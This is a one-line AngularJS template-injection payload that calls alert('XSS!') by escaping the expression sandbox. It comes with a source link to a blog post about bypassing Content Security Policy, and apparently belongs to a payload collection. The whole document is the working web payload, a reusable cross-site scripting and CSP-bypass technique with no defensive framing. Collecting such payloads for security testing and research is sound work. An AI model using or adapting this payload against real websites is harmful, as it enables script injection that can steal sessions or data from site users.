{{$on.curry.call().alert('XSS!')}}
source:
https://blog.0daylabs.com/2016/09/09/bypassing-csp/